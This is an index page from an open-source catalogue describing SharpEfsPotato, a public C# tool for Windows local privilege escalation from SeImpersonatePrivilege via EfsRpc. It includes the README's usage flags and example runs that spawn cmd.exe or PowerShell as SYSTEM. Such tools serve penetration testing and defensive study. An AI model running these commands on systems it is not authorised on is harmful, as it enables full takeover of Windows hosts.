Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/bugch3ck/SharpEfsPotato

Local privilege escalation from SeImpersonatePrivilege using EfsRpc.
https://github.com/bugch3ck/SharpEfsPotato

Last synced: 21 days ago
JSON representation

Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Host: GitHub
URL: https://github.com/bugch3ck/SharpEfsPotato
Owner: bugch3ck
Created: 2022-10-17T12:20:47.000Z (about 2 years ago)
Default Branch: master
Last Pushed: 2022-10-17T12:35:06.000Z (about 2 years ago)
Last Synced: 2024-08-05T17:25:57.991Z (4 months ago)
Language: C#
Homepage:
Size: 31.3 KB
Stars: 294
Watchers: 5
Forks: 43
Open Issues: 0
Metadata Files:
- Readme: README.md

Awesome Lists containing this project

awesome-hacking-lists - bugch3ck/SharpEfsPotato - Local privilege escalation from SeImpersonatePrivilege using EfsRpc. (C# #)

README

# SharpEfsPotato

Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

## Usage

```
C:\temp>SharpEfsPotato.exe -h
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

-p, --prog=VALUE Program to launch (default cmd.exe)
-a, --args=VALUE Arguments for program (default null)
-h, --help Display this help
```

## Examples

### Default behavior: Start cmd.exe as system in a separate process (in separate console)

```
C:\temp>SharpEfsPotato.exe
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/44259a4a-cbea-499b-9dc5-a9b1c13a4b9f/\44259a4a-cbea-499b-9dc5-a9b1c13a4b9f\44259a4a-cbea-499b-9dc5-a9b1c13a4b9f
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!
```

### Specify PowerShell binary and arguments

```
C:\temp>SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system
```